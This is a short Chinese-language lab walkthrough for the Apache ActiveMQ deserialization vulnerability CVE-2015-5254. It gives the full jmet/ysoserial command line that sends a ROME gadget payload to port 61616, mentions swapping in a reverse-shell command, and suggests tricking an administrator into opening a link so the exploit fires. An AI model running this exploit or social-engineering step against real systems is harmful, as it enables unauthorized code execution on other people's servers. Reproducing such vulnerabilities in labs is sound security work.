CVE-2015-5254 ActiveMQ 反序列化漏洞
一、漏洞简介
Apache ActiveMQ 5.13.0 之前 5.x 版本中存在安全漏洞,该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的 Java Message Service(JMS) ObjectMessage 对象利用该漏洞执行任意代码。
二、漏洞影响
Apache ActiveMQ 5.13.0 之前的 5.x 版本
三、复现过程
漏洞利用过程如下:
- 构造(可以使用 ysoserial)可执行命令的序列化对象
- 作为一个消息,发送给目标 61616 端口
- 访问 web 管理页面,读取消息,触发漏洞
使用 jmet 进行漏洞利用。首先下载 jmet 的 jar 文件,并在同目录下创建一个 external 文件夹(否则可能会爆文件夹不存在的错误)。jmet 原理是使用 ysoserial 生成 Payload 并发送(其 jar 内自带 ysoserial,无需再自己下载),所以我们需要在 ysoserial 是 gadget 中选择一个可以使用的,比如 ROME。
执行:
java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME your-ip 61616
此时会给目标 ActiveMQ 添加一个名为 event 的队列,我们可以通过 http://your-ip:8161/admin/browse.jsp?JMSDestination=event 看到这个队列中所有消息:
点击查看这条消息即可触发命令执行,此时进入容器 docker-compose exec activemq bash ,可见/tmp/success 已成功创建,说明漏洞利用成功:
将命令替换成弹 shell 语句再利用:
值得注意的是,通过 web 管理页面访问消息并触发漏洞这个过程需要管理员权限。在没有密码的情况下,我们可以诱导管理员访问我们的链接以触发,或者伪装成其他合法服务需要的消息,等待客户端访问的时候触发。
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论